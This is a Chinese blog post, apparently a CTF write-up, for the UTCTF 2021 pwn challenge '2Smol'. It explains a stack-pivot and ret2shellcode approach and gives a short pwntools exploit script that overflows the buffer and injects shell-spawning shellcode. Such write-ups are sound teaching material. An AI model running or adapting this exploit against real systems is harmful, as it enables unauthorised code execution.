2021-03-18  543346a940335b62d4e9d52589928b48 99+   a minute   0.1 k0 visits

utctf2021 write up for 2Smol

又是一道栈迁移…

惯例的checksec,保护全关,整挺好

image.png

拖入IDA进行分析

image.png

直接就有一个很大的溢出可以利用

由于程序本身没有调用libc库,故考虑栈迁移 + ret2shellcode以get shell

构造exp如下:

1
2
3
4
5
6
from pwn import *
context.arch = 'amd64'
p = process('./smol') # p = remote('pwn.utctf.live', 9998)
p.send(b'A' * 8 + p64(0x402008 + 0x500) + p64(0x401015))
p.send(p64(0x402020 + 0x500) * 4 + asm(shellcraft.sh()))
p.interactive()

运行即可get shell

image.png

utctf2021 write up for 2Smol

http://meteorpursuer.github.io/2021/03/18/utctf2021 write up for 2Smol/

Posted on

2021-03-18

Updated on

2023-02-05

Licensed under

# Related Post
  1.RWCTF2023体验赛 write up for Digging into kernel 3
  2.minilctf2020 write up for easycpp
  3.moectf2020 write up for baby canary
  4.moectf2020 write up for baby migration
  5.GWCTF 2019 write up for xxor
  6.dmctf2020 write up for re4
  7.moectf2020 write up for rop2
  8.dmctf2020 write up for re1

Like this article? Support the author with

Comments
Follow

:D 一言句子获取中...

Links

Latest Comment

Loading...Wait a Minute!

Recents

Categories

Archives

Tags

Pwn10
信息安全10
moectf9
C/C++8
Python8
ROP6
ret2csu3
reverse3
栈迁移3
Java2
ret2shellcode2
并查集2
2
链表2
DFS1
Linux kernel1
QT1
Reverse1
UAF1
canary1
查看全部>>

Subscribe for updates

×